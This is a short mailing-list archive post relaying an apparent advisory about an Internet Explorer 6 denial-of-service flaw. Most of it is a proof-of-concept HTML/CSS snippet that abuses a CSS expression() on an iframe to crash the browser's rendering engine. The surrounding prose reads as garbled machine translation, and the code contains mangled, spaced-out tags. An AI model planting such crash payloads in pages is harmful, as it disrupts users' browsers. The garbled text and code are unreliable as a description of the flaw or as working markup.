IE6 css set Denial of Service Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

Published by Securitylab.ir
Founder: unknown

<style type="text/css">
<! -
The question is which set the css style of the time wrong.
css definition is f: expression (this.src = 'about: blank', this.outerHTML ='');
In question should be is mshtml.dll ->
/*<![ CDATA [*/
iframe{
f: expression(this.src='about:blank',this.outerHTML='');
}
# F126 (v: expression ()! Important)
/*]]>*/
</ Style>
<iframe id=f126 src=test>

Original Advisory:
http://securitylab.ir/other/IE-1.txt
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux